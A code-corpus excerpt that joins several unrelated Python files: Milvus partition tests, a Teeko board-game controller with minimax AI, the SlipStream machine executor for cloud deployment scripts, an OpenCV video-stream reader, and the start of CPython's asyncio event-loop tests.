expected: 1. create successfully
"""
# create collection
collection_w = self.init_collection_wrap()
for _ in range(10):
partition_name = cf.gen_unique_str(prefix)
# create partition with different names and check the partition exists
self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L2)
def test_partition_maximum_partitions(self):
"""
target: verify create maximum partitions
method: 1. create maximum partitions
2. create one more partition
expected: 1. raise exception
"""
threads_num = 8
threads = []
def create_partition(collection, threads_n):
for _ in range(ct.max_partition_num // threads_n):
name = cf.gen_unique_str(prefix)
par_wrap = ApiPartitionWrapper()
par_wrap.init_partition(collection, name, check_task="check_nothing")
collection_w = self.init_collection_wrap()
for _ in range(threads_num):
t = threading.Thread(target=create_partition, args=(collection_w.collection, threads_num))
threads.append(t)
t.start()
for t in threads:
t.join()
p_name = cf.gen_unique_str()
self.partition_wrap.init_partition(
collection_w.collection, p_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: "maximum partition's number should be limit to 4096"})
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("partition_name", [ct.default_partition_name])
def test_partition_drop_default_partition(self, partition_name):
"""
target: verify drop the _default partition
method: 1. drop the _default partition
expected: 1. raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# get the default partition
default_partition, _ = collection_w.partition(ct.default_partition_name)
partition_w = self.init_partition_wrap(collection_w, ct.default_partition_name)
assert default_partition.name == partition_w.name
# verify that drop partition with error
partition_w.drop(check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "default partition cannot be deleted"})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
def test_partition_drop_partition_twice(self, partition_name):
"""
target: verify drop the same partition twice
method: 1.create a partition with default schema
2. drop the partition
3. drop the same partition again
expected: raise exception when 2nd time
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_w = self.init_partition_wrap(collection_w, partition_name)
collection_w.has_partition(partition_name)
# drop partition
partition_w.drop()
assert not collection_w.has_partition(partition_name)[0]
# verify that drop the partition again with exception
partition_w.drop(check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "Partition not exist"})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
def test_partition_create_and_drop_multi_times(self, partition_name):
"""
target: verify create and drop for times
method: 1.create a partition with default schema
2. drop the partition
3. loop #1 and #2 for times
expected: create and drop successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# range for 5 times
for i in range(5):
# create partition and check that the partition exists
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# drop partition and check that the partition not exists
partition_w.drop()
assert not collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L2)
# @pytest.mark.parametrize("flush", [True, False])
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
def test_partition_drop_non_empty_partition(self, partition_name):
"""
target: verify drop a partition which has data inserted
method: 1.create a partition with default schema
2. insert some data
3. flush / not flush
3. drop the partition
expected: drop successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# insert data to partition
partition_w.insert(cf.gen_default_dataframe_data())
# # flush remove flush for issue #5837
# if flush:
# self._connect().flush([collection_w.name])
# drop partition
partition_w.drop()
assert not collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L2)
# @pytest.mark.parametrize("flush", [True, False])
@pytest.mark.parametrize("partition_name, data", [(cf.gen_unique_str(prefix), cf.gen_default_list_data(nb=10))])
@pytest.mark.parametrize("index_param", cf.gen_simple_index())
def test_partition_drop_indexed_partition(self, partition_name, data, index_param):
"""
target: verify drop an indexed partition
method: 1.create a partition
2. insert same data
3. create an index
4. flush or not flush (remove flush step for issue # 5837)
5. drop the partition
expected: drop successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# insert data to partition
partition_w.insert(data)
# create index of collection
collection_w.create_index(ct.default_float_vec_field_name, index_param)
# # flush
# if flush:
# self._connect().flush([collection_w.name])
# drop partition
partition_w.drop()
assert not collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L1)
def test_partition_release_empty_partition(self):
"""
target: verify release an empty partition
method: 1.create a partition
2. release the partition
expected: release successfully
"""
# create partition
partition_w = self.init_partition_wrap()
assert partition_w.is_empty
# release partition
partition_w.release()
# TODO: assert no more memory consumed
@pytest.mark.tags(CaseLabel.L1)
def test_partition_release_dropped_partition(self):
"""
target: verify release an dropped partition
method: 1.create a partition
2. drop the partition
2. release the partition
expected: raise exception
"""
# create partition
partition_w = self.init_partition_wrap()
# drop partition
partition_w.drop()
# release the dropped partition and check err response
partition_w.release(check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "Partition not exist"})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
def test_partition_release_dropped_collection(self, partition_name):
"""
target: verify release an dropped collection
method: 1.create a collection and partition
2. drop the collection
2. release the partition
expected: raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# drop collection
collection_w.drop()
# release the partition and check err response
partition_w.release(check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "can't find collection"})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name, search_vectors",
[(cf.gen_unique_str(prefix), cf.gen_vectors(1, ct.default_dim))])
def test_partition_release_after_collection_released(self, partition_name, search_vectors):
"""
target: verify release a partition after the collection released
method: 1.create a collection and partition
2. insert some data
2. release the collection
2. release the partition
expected: partition released successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# insert data to partition
data = cf.gen_default_list_data()
partition_w.insert(data)
assert partition_w.num_entities == len(data[0])
assert collection_w.num_entities == len(data[0])
# load partition
partition_w.load()
# search of partition
res_1, _ = partition_w.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1)
assert len(res_1) == 1
# release collection
collection_w.release()
# search of partition
res_2, _ = partition_w.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1,
check_task=ct.CheckTasks.err_res,
check_items={ct.err_code: 0,
ct.err_msg: "not loaded into memory"})
# release partition
partition_w.release()
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name, data", [(ct.default_partition_name, cf.gen_default_dataframe_data())])
def test_partition_insert_default_partition(self, partition_name, data):
"""
target: verify insert data into _default partition
method: 1.create a collection
2. insert some data into _default partition
expected: insert successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# get the default partition
assert collection_w.has_partition(partition_name)[0]
partition_w = self.init_partition_wrap(collection_w, partition_name)
# insert data to partition
partition_w.insert(data)
# self._connect().flush([collection_w.name])
assert partition_w.num_entities == len(data)
@pytest.mark.tags(CaseLabel.L1)
def test_partition_insert_dropped_partition(self):
"""
target: verify insert data into dropped partition
method: 1.create a collection
2. insert some data into dropped partition
expected: raise exception
"""
# create partition
partition_w = self.init_partition_wrap()
# drop partition
partition_w.drop()
# insert data to partition
partition_w.insert(cf.gen_default_dataframe_data(),
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "Partition not exist"})
# TODO: update the assert error
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
def test_partition_insert_dropped_collection(self, partition_name):
"""
target: verify insert data into dropped collection
method: 1.create a collection
2. insert some data into dropped collection
expected: raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# drop collection
collection_w.drop()
# insert data to partition
partition_w.insert(cf.gen_default_dataframe_data(),
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "None Type"})
@pytest.mark.tags(CaseLabel.L1)
def test_partition_insert_maximum_size_data(self, data):
"""
target: verify insert maximum size data(256M?) a time
method: 1.create a partition
2. insert maximum size data
expected: insert successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_w = self.init_partition_wrap(collection_w)
# insert data to partition
max_size = 100000 # TODO: clarify the max size of data
partition_w.insert(cf.gen_default_dataframe_data(max_size))
# self._connect().flush([collection_w.name])
assert partition_w.num_entities == max_size
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("dim", [ct.default_dim - 1, ct.default_dim + 1])
def test_partition_insert_mismatched_dimensions(self, dim):
"""
target: verify insert maximum size data(256M?) a time
method: 1.create a collection with default dim
2. insert dismatch dim data
expected: raise exception
"""
# create partition
partition_w = self.init_partition_wrap()
data = cf.gen_default_list_data(nb=10, dim=dim)
# insert data to partition
partition_w.insert(data, check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "but entities field dim"})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("sync", [True, False])
def test_partition_insert_sync(self, sync):
"""
target: verify insert sync
method: 1.create a partition
2. insert data in sync
expected: insert successfully
"""
pass
|
Controleur.py
|
# -*- coding: utf-8 -*-
from VueJeu import *
from Model import *
from random import randint
import MinMax
import AlphaBeta
import threading
import os
class Controleur:
""" Classe qui gère le passage du menu au jeu et qui gère les différentes actions (clic)
- root : fenêtre principal de l'application
- frame : frame contenant les éléments graphiques
- choix1 / choix2 : contient le type de joueur sélectionner (0 -> joueur, 1 -> IA)
- model : contient les informations a propos de la partie en cours
- vueJeu : contient l'interface graphique de la partie en cours
"""
enable_click = True
def __init__(self):
self.root = Tk()
self.root.title("Teeko")
self.root.resizable(0, 0)
self.root.geometry("500x500")
self.frame = Frame(self.root, width=500, height=550, borderwidth=1)
self.creation_barre_menu()
self.creation_menu()
self.root.mainloop()
def creation_menu(self):
self.frame.pack(fill=BOTH)
self.choix_1 = IntVar()
self.choix_2 = IntVar()
self.label_1 = Label(self.frame, text="Niveau IA 1 : ")
self.label_2 = Label(self.frame, text="Niveau IA 2 : ")
self.lb_1 = Listbox(self.frame, height=len(
parameters.tabLevels), selectmode=SINGLE, exportselection=0)
self.lb_2 = Listbox(self.frame, height=len(
parameters.tabLevels), selectmode=SINGLE, exportselection=0)
choix_joueur1 = Radiobutton(
self.frame, text="Joueur", variable=self.choix_1, value=0)
choix_ia1 = Radiobutton(self.frame, text="IA",
variable=self.choix_1, value=1)
choix_joueur1.pack()
choix_ia1.pack()
self.label_1.pack()
for i in range(1, len(parameters.tabLevels) + 1):
self.lb_1.insert(END, i)
self.lb_1.pack()
choix_joueur2 = Radiobutton(
self.frame, text="Joueur", variable=self.choix_2, value=0)
choix_ia2 = Radiobutton(self.frame, text="IA",
variable=self.choix_2, value=1)
choix_joueur2.pack()
choix_ia2.pack()
self.label_2.pack()
for i in range(1, len(parameters.tabLevels) + 1):
self.lb_2.insert(END, i)
self.lb_2.pack()
bouton_jouer = Button(self.frame, text="Jouer",
command=self.lancement_jeu)
bouton_jouer.pack()
def action_on_mouse_event(self, event):
if not self.model.get_gagnant() and self.enable_click:
x = event.x - 60
y = event.y - 60
if x > 0 and y > 0:
x = int(x / 82)
y = int(y / 82)
if x < 5 and y < 5:
if self.model.action(x, y):
# Affiche le coup du joueur courant
self.vue_jeu.affichage()
# Si c'est au tour de l'ia de jouer
if self.model.tour == self.model.joueur1 == self.model.TYPE_IA or (self.model.tour == 2 and self.model.joueur2 == self.model.TYPE_IA):
# Désactive click utilisateur pendant que l'ia joue
self.enable_click = False
if parameters.elagage:
functarget = AlphaBeta.min_max
else:
functarget = MinMax.min_max
pMax = self.model.pMax_ias[self.model.tour]
eval_enable = self.model.eval_ias[self.model.tour]
# Lance calcul de l'ia dans un thread
t = threading.Thread(
target=functarget, args=(self.model, pMax, eval_enable))
t.start()
# Attendre que l'IA joue...
t.join()
self.vue_jeu.affichage()
self.enable_click = True
if self.model.get_gagnant():
self.affiche_gagnant()
def ia_vs_ia(self):
# Pose un premier pion aléatoirement
x = randint(0, 4)
y = randint(0, 4)
self.model.pose_pion(x, y)
# Joue tant qu'il n'y a pas de gagnant
while not self.model.gagnant:
if parameters.elagage:
functarget = AlphaBeta.min_max
else:
functarget = MinMax.min_max
pMax = self.model.pMax_ias[self.model.tour]
eval_enable = self.model.eval_ias[self.model.tour]
# Lance calcul de l'ia dans un thread
t = threading.Thread(
target=functarget, args=(self.model, pMax, eval_enable))
t.start()
# Attendre que l'IA joue...
t.join()
self.vue_jeu.affichage()
def affiche_gagnant(self):
self.fenetre_gagnant = Tk()
self.fenetre_gagnant.title('Fin partie')
self.fenetre_gagnant.geometry("200x100")
champ_label = Label(self.fenetre_gagnant, text="Le joueur n°" +
str(self.model.get_tour()) + " a gagné !")
champ_label.pack()
self.fenetre_gagnant.mainloop()
def relance_menu(self):
for widget in self.frame.winfo_children():
widget.destroy()
self.creation_menu()
def lancement_jeu(self):
selection_level_ia_1 = self.lb_1.curselection()
selection_level_ia_2 = self.lb_2.curselection()
# Tester si un des joueurs est une IA
# et si un niveau est bien sélectionné
ready = True
if self.choix_1.get() == 1 and not selection_level_ia_1:
ready = False
if self.choix_2.get() == 1 and not selection_level_ia_2:
ready = False
# Si il y a une IA et que son niveau et sélectionné
if ready:
# Création du model
self.model = Model(self.choix_1.get(), self.choix_2.get())
# Récupération du niveau de chaque IA (si un des joueur est de type IA au moins)
# set pMax et eval boolean
if self.choix_1.get() == 1:
self.model.pMax_ias[1] = parameters.tabLevels[self.lb_1.get(
ACTIVE) - 1][1]
self.model.eval_ias[1] = parameters.tabLevels[self.lb_1.get(
ACTIVE) - 1][2]
if self.choix_2.get() == 1:
self.model.pMax_ias[2] = parameters.tabLevels[self.lb_2.get(
ACTIVE) - 1][1]
self.model.eval_ias[2] = parameters.tabLevels[self.lb_2.get(
ACTIVE) - 1][2]
# Si combat IA vs IA, alors lancer le jeu dans une console
if self.model.joueur1 == self.model.joueur2 == self.model.TYPE_IA:
dir_path = os.path.dirname(os.path.realpath(__file__))
# os.path.join(dir_path, 'VueConsole.py')
pMax_1 = str(
parameters.tabLevels[self.lb_1.get(ACTIVE) - 1][1])
eval_1 = str(
parameters.tabLevels[self.lb_1.get(ACTIVE) - 1][2])
pMax_2 = str(
parameters.tabLevels[self.lb_2.get(ACTIVE) - 1][1])
eval_2 = str(
parameters.tabLevels[self.lb_2.get(ACTIVE) - 1][2])
os.system('start /B start cmd.exe @cmd /k python ' +
dir_path + "\VueConsole.py" + " " + pMax_1 + " " + eval_1 + " " + pMax_2 + " " + eval_2)
# Enleve le menu affiché
for widget in self.frame.winfo_children():
widget.destroy()
# Sinon, lancer le GUI du jeu
else:
# Enleve le menu affiché
for widget in self.frame.winfo_children():
widget.destroy()
self.vue_jeu = VueJeu(self.model, self.frame,
self.action_on_mouse_event)
self.vue_jeu.update_status_label()
def creation_barre_menu(self):
menubar = Menu(self.root)
self.root.config(menu=menubar)
menubar.add_command(label="Rejouer", command=self.relance_menu)
|
MachineExecutor.py
|
"""
SlipStream Client
=====
Copyright (C) 2014 SixSq Sarl (sixsq.com)
=====
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import re
import sys
import time
import errno
import codecs
import traceback
import tarfile
import tempfile
import random
from Queue import Queue, Empty
from threading import Thread
from slipstream.ConfigHolder import ConfigHolder
from slipstream.exceptions.Exceptions import AbortException, TerminalStateException, ExecutionException
from slipstream.NodeDecorator import NodeDecorator
from slipstream import util
class MachineExecutor(object):
WAIT_NEXT_STATE_SHORT = 15
WAIT_NEXT_STATE_LONG = 60
EMPTY_STATE_RETRIES_NUM = 4
# Wait interval (seconds) between server calls when executing a target script.
TARGET_POLL_INTERVAL = 30
SCRIPT_EXIT_SUCCESS = 0
def __init__(self, wrapper, config_holder=ConfigHolder()):
"""
:param wrapper: SlipStream client and cloud client wrapper
:type wrapper: slipstream.wrappers.CloudWrapper
:param config_holder: configuration holder
:type config_holder: slipstream.ConfigHolder
"""
self.wrapper = wrapper
self.timeout = 55 * 60 # 55 minutes
self.ssLogDir = util.get_platform_reports_dir()
self.verboseLevel = 0
config_holder.assign(self)
self.reportFilesAndDirsList = [self.ssLogDir]
self.node_instance = self._retrieve_my_node_instance()
self.recovery_mode = False
self._send_reports = False
def execute(self):
try:
self._execute()
except Exception as ex:
self._fail_global(ex)
def _execute(self):
state = self._get_state()
while True:
self._execute_state(state)
self._complete_state(state)
state = self._wait_for_next_state(state)
def _get_state(self):
state = self.wrapper.getState()
if state:
return state
else:
for stime in self._get_state_retry_sleep_times():
util.printDetail('WARNING: Got no state. Retrying after %s sec.' % stime)
self._sleep(stime)
state = self.wrapper.getState()
if state:
return state
raise ExecutionException('ERROR: Machine executor: Got no state from server.')
def _get_state_retry_sleep_times(self):
return [1] + random.sample(range(1, self.EMPTY_STATE_RETRIES_NUM + 2),
self.EMPTY_STATE_RETRIES_NUM)
def _execute_state(self, state):
if not state:
raise ExecutionException('ERROR: Machine executor: No state to execute '
'specified.')
try:
self._set_state_start_time()
method_name = 'on' + state
if hasattr(self, method_name):
getattr(self, method_name)()
else:
self._state_not_implemented(state)
except AbortException as ex:
util.printError('Abort flag raised: %s' % ex)
except TerminalStateException:
return
except KeyboardInterrupt:
raise
except (SystemExit, Exception) as ex:
if isinstance(ex, SystemExit) and str(ex).startswith('Terminating on signal'):
self._log_and_set_statecustom('Machine executor is stopping with: %s' % ex)
else:
util.printError('Error executing node, with detail: %s' % ex)
traceback.print_exc()
self._fail(ex)
self.onSendingReports()
def _state_not_implemented(self, state):
msg = "Machine executor does not implement '%s' state." % state
traceback.print_exc()
self._fail_str(msg)
self.onSendingReports()
def _complete_state(self, state):
if self._need_to_complete(state):
self.wrapper.complete_state()
@staticmethod
def _failure_msg_from_exception(exception):
"""
:param exception: exception class
:return: string
"""
return "Exception %s with detail: %s" % (exception.__class__, str(exception))
def _fail(self, exception):
self.wrapper.fail(self._failure_msg_from_exception(exception))
def _fail_global(self, exception):
self.wrapper.fail_global(self._failure_msg_from_exception(exception))
def _fail_str(self, msg):
self.wrapper.fail(msg)
def _wait_for_next_state(self, state):
"""Returns the next state after waiting (polling is used) for the state
transition from the server.
"""
util.printDetail('Waiting for the next state transition, currently in %s' % state,
self.verboseLevel, util.VERBOSE_LEVEL_NORMAL)
while True:
new_state = self._get_state()
if state != new_state:
return new_state
self._sleep(self._get_sleep_time(state))
def _in_ready_and_no_need_to_stop_images(self, state):
return state == 'Ready' and not self.wrapper.need_to_stop_images()
def _in_ready_and_mutable_run(self, state):
return state == 'Ready' and self._is_mutable()
@staticmethod
def _sleep(seconds):
util.sleep(seconds)
def _get_sleep_time(self, state):
if not self._is_mutable() and self._in_ready_and_no_need_to_stop_images(state):
return self.WAIT_NEXT_STATE_LONG
return self.WAIT_NEXT_STATE_SHORT
def _retrieve_my_node_instance(self):
node_instance = self.wrapper.get_my_node_instance()
if node_instance is None:
raise ExecutionException("Couldn't get the node instance for the current VM.")
return node_instance
def _get_recovery_mode(self):
self.recovery_mode = self.wrapper.get_recovery_mode()
def _is_recovery_mode(self):
return self.recovery_mode == True
def _is_mutable(self):
return self.wrapper.is_mutable()
def _need_to_complete(self, state):
return state not in ['Finalizing', 'Done', 'Cancelled', 'Aborted']
def _set_need_to_send_reports(self):
self._send_reports = True
def _execute_execute_target(self):
self._execute_target('execute', abort_on_err=True)
self._set_need_to_send_reports()
def _execute_target(self, target_name, exports=None, abort_on_err=False, ssdisplay=True, ignore_abort=False):
target = self.node_instance.get_image_target(target_name)
display_target_name = {
'prerecipe': 'Pre-install',
'recipe': 'Post-install',
'execute': 'Deployment',
'report': 'Reporting',
'onvmadd': 'On VM Add',
'onvmremove': 'On VM Remove'
}.get(target_name, target_name)
if target is None:
util.printAndFlush('Nothing to do for script: %s' % display_target_name)
return
for subtarget in target:
full_target_name = '%s:%s' % (subtarget.get('module_uri'), display_target_name)
if target_name in [NodeDecorator.NODE_PRERECIPE, NodeDecorator.NODE_RECIPE] \
and not self._need_to_execute_build_step(target, subtarget):
util.printAndFlush('Component already built. Nothing to do on target: %s' % full_target_name)
continue
script = subtarget.get('script')
if script:
message = "Executing script '%s'" % full_target_name
util.printStep(message)
if ssdisplay:
self.wrapper.set_statecustom(message)
fail_msg = "Failed running '%s' script on '%s'" % (full_target_name, self._get_node_instance_name())
self._launch_script(script, exports, abort_on_err, ignore_abort, fail_msg, full_target_name)
else:
util.printAndFlush('Nothing to do for script: %s' % full_target_name)
def _need_to_execute_build_step(self, target, subtarget):
return MachineExecutor.need_to_execute_build_step(self._get_node_instance(), target, subtarget)
@staticmethod
def need_to_execute_build_step(node_instance, target, subtarget):
module_uri = subtarget.get('module_uri')
build_states = node_instance.get_build_state()
cloud = node_instance.get_cloud()
for st in reversed(target):
st_module_uri = st.get('module_uri')
build_state = build_states.get(st_module_uri, {})
if cloud in build_state.get('built_on', []):
return False
if st_module_uri == module_uri:
return True
return True
def is_image_built(self):
node_instance = self._get_node_instance()
module_uri = node_instance.get_image_resource_uri()
build_state = node_instance.get_build_state().get(module_uri, {})
cloud = node_instance.get_cloud()
return cloud in build_state.get('built_on', [])
def _get_script_name(self, name):
return name if name is not None else NodeDecorator.DEFAULT_SCRIPT_NAME
def _launch_script(self, script, exports=None, abort_on_err=True, ignore_abort=False, fail_msg=None, name=None):
_name = self._get_script_name(name)
if fail_msg is None:
fail_msg = "Failed running script '%s' on '%s'" % (_name, self._get_node_instance_name())
try:
rc, stderr_last_line = self._run_target_script(script, exports, ignore_abort=ignore_abort, name=name)
sys.stdout.flush()
sys.stderr.flush()
except Exception as ex:
msg = '%s: %s' % (fail_msg, str(ex))
if abort_on_err:
self.wrapper.fail(msg)
raise
else:
if rc != self.SCRIPT_EXIT_SUCCESS and abort_on_err:
if stderr_last_line is not None:
fail_msg += ': %s' % stderr_last_line
self.wrapper.fail(fail_msg)
raise AbortException(fail_msg)
def _run_target_script(self, target_script, exports=None, ignore_abort=False, name=None):
'''Return exit code of the user script and the last line of stderr
Output of the script goes to stdout/err and will end up in the node executor's log file.
'''
_name = self._get_script_name(name)
if not target_script:
util.printAndFlush('Script "%s" is empty\n' % (_name,))
return self.SCRIPT_EXIT_SUCCESS
if not isinstance(target_script, basestring):
raise ExecutionException('Not a string buffer provided as target for script "%s". Type is: %s'
% (_name, type(target_script)))
process = self._launch_process(target_script, exports, name)
result = Queue()
t = Thread(target=self.print_and_keep_last_stderr, args=(process.stderr, result))
t.daemon = True # thread dies with the program
t.start()
try:
# The process is still working on the background.
while process.poll() is None:
# Ask server whether the abort flag is set. If so, kill the
# process and exit. Otherwise, sleep for some time.
if not ignore_abort and self.wrapper.isAbort():
try:
util.printDetail('Abort flag detected. '
'Terminating execution of script "%s"...' % (_name,))
process.terminate()
util.sleep(5)
if process.poll() is None:
util.printDetail('Termination is taking too long. '
'Killing the script "%s"...' % (_name,))
process.kill()
except OSError:
pass
break
util.sleep(self.TARGET_POLL_INTERVAL)
except IOError as e:
if e.errno != errno.EINTR:
raise
else:
util.printDetail('Signal EINTR detected. Ignoring it.')
return 0
util.printDetail("End of the script '%s'" % (_name,))
stderr_last_line = ''
try:
stderr_last_line = result.get(timeout=60)
except Empty:
pass
return process.returncode, stderr_last_line
def _write_target_script_to_file(self, target_script, name=None):
file_suffix = ''
if util.is_windows():
file_suffix = '.ps1'
directory = None
try:
directory = util.get_state_storage_dir()
except Exception as e:
util.printError('Creating script storage directory failed with: "%s"' % (e,))
if name is None or directory is None:
fn = tempfile.mktemp(suffix=file_suffix, dir=directory)
else:
filename = re.sub(r'[^0-9a-z._-]', '', name.replace('/', '_').replace(' ', '-').replace(':', '__').lower())
if file_suffix:
filename += file_suffix
fn = os.path.join(directory, filename)
if isinstance(target_script, unicode):
with codecs.open(fn, 'w', 'utf8') as fh:
fh.write(target_script)
else:
with open(fn, 'w') as fh:
fh.write(target_script)
os.chmod(fn, 0755)
return fn
def _launch_process(self, target_script, exports=None, name=None):
'''Returns launched process as subprocess.Popen instance.
'''
try:
fn = self._write_target_script_to_file(target_script, name)
except Exception as e:
util.printError('Writing script "%s" to file failed with: "%s". Retrying with random filename.' % (name, e))
fn = self._write_target_script_to_file(target_script)
current_dir = os.getcwd()
new_dir = util.get_temporary_storage_dir()
os.chdir(new_dir)
if 'HOME' not in os.environ:
if exports is None:
exports = {}
exports['HOME'] = os.path.expanduser('~')
try:
process = util.execute(fn, noWait=True, extra_env=exports, withStderr=True)
finally:
os.chdir(current_dir)
return process
def print_and_keep_last_stderr(self, stderr, result):
last_line = None
for line in iter(stderr.readline, b''):
sys.stderr.write(line)
if line.strip():
last_line = line.strip()
result.put(last_line)
def onInitializing(self):
util.printAction('Initializing')
def onProvisioning(self):
util.printAction('Provisioning')
self._clean_user_info_cache()
self._clean_local_cache()
def _clean_user_info_cache(self):
self.wrapper.discard_user_info_locally()
def _clean_local_cache(self):
self.wrapper.clean_local_cache()
def onExecuting(self):
util.printAction('Executing')
def onSendingReports(self):
util.printAction('Sending reports')
reportFileName = '%s_report_%s.tgz' % (
self._get_node_instance_name(), util.toTimeInIso8601NoColon(time.time()))
reportFileName = os.path.join(tempfile.gettempdir(), reportFileName)
try:
archive = tarfile.open(reportFileName, 'w:gz')
for element in self.reportFilesAndDirsList:
name = '_'.join(os.path.abspath(element).strip(os.sep).split(os.sep))
archive.add(os.path.expandvars(element), name)
except Exception as e:
raise RuntimeError("Failed to bundle reports:\n%s" % e)
archive.close()
self.wrapper.send_report(reportFileName)
def onReady(self):
util.printAction('Ready')
def onFinalizing(self):
util.printAction('Finalizing')
if self.wrapper.isAbort():
util.printError("Failed")
else:
util.printAction('Done!')
def onDone(self):
self._abort_running_in_final_state()
def onCancelled(self):
self._abort_running_in_final_state()
def onAborted(self):
self._abort_running_in_final_state()
def _abort_running_in_final_state(self):
time.sleep(60)
raise ExecutionException('The run is in a final state but the VM is still running !')
def get_cloud_service_name(self):
return self.wrapper._get_cloud_service_name()
def _get_node_instance(self):
return self.wrapper.get_my_node_instance()
def _get_node_instance_name(self):
return self.wrapper.get_my_node_instance_name()
def _killItself(self, is_build_image=False):
self.wrapper.stopOrchestrator(is_build_image)
def _set_state_start_time(self):
self.wrapper.set_state_start_time()
def _log_and_set_statecustom(self, msg):
self.wrapper._log_and_set_statecustom(msg)
|
VideoStream.py
|
from threading import Thread
import sys
import cv2
from queue import Queue
# This class reads all the video frames in a separate thread and always has the
# keeps only the latest frame in its queue to be grabbed by another thread
class VideoStream(object):
def __init__(self, path, queueSize=15):
self.stream = cv2.VideoCapture(path)
self.stopped = False
self.Q = Queue(maxsize=queueSize)
def start(self):
# start a thread to read frames from the video stream
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
try:
while True:
if self.stopped:
return
if not self.Q.full():
(grabbed, frame) = self.stream.read()
# if the `grabbed` boolean is `False`, then we have
# reached the end of the video file
if not grabbed:
self.stop()
return
self.Q.put(frame)
#Clean the queue to keep only the latest frame
while self.Q.qsize() > 1:
self.Q.get()
except Exception as e:
print("got error: "+str(e))
def read(self):
return self.Q.get()
def more(self):
return self.Q.qsize() > 0
def stop(self):
self.stopped = True
def __exit__(self, exception_type, exception_value, traceback):
self.stream.release()
|
test_events.py
|
"""Tests for events.py."""
import collections.abc
import concurrent.futures
import functools
import io
import os
import platform
import re
import signal
import socket
try:
import ssl
except ImportError:
ssl = None
import subprocess
import sys
import threading
import time
import errno
import unittest
from unittest import mock
import weakref
if sys.platform != 'win32':
import tty
import asyncio
from asyncio import coroutines
from asyncio import events
from asyncio import proactor_events
from asyncio import selector_events
from test.test_asyncio import utils as test_utils
from test import support
from test.support import socket_helper
from test.support import ALWAYS_EQ, LARGEST, SMALLEST
def tearDownModule():
asyncio.set_event_loop_policy(None)
def broken_unix_getsockname():
"""Return True if the platform is Mac OS 10.4 or older."""
if sys.platform.startswith("aix"):
return True
elif sys.platform != 'darwin':
return False
version = platform.mac_ver()[0]
version = tuple(map(int, version.split('.')))
return version < (10, 5)
def _test_get_event_loop_new_process__sub_proc():
async def doit():
return 'hello'
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return loop.run_until_complete(doit())
class CoroLike:
def send(self, v):
pass
def throw(self, *exc):
pass
def close(self):
pass
def __await__(self):
pass
class MyBaseProto(asyncio.Protocol):
connected = None
done = None
def __init__(self, loop=None):
self.transport = None
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.connected = loop.create_future()
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
if self.connected:
self.connected.set_result(None)
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyProto(MyBaseProto):
def connection_made(self, transport):
super().connection_made(transport)
